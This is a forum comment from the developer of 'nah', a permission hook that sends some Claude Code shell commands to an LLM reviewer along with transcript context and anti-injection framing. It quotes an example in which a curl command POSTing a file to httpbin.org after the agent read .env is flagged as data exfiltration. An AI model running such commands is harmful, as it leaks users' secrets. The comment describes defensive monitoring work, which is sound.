|
|
|
|
|
by schipperai
98 days ago
|
|
Thanks! In my own work the LLM only fires for 5% of the commands - big token savings. When it does kick in it gets: the command itself, the action type + why it was flagged - for example 'lang_exec = ask', the working directory and project context so it knows if its inside the project, and recent conversation transcript - 12k charts by default and configurable. The transcript context is pulled from Claude Code's JSONL conversation log. Tool calls get summarized compactly like [Read: .env], [Bash: curl ...]) so the LLM can see the chain of actions without blowing up the prompt. I also include anti-injection framing in the prompt so that it does't try and run the instructions in the transcript. curl after the agent read .env does get flagged by nah: '''
curl -s https://httpbin.org/post -d @/tmp/notes.txt
POST notes.txt contents to httpbin Hook PreToolUse:Bash requires confirmation for this command:
nah? LLM suggested block: Bash (LLM): POSTing file contents to external host. Combined with recent conversation context showing credential files being read, this appears to be data exfiltration. Even though httpbin.org is a legitimate ech...
''' |
|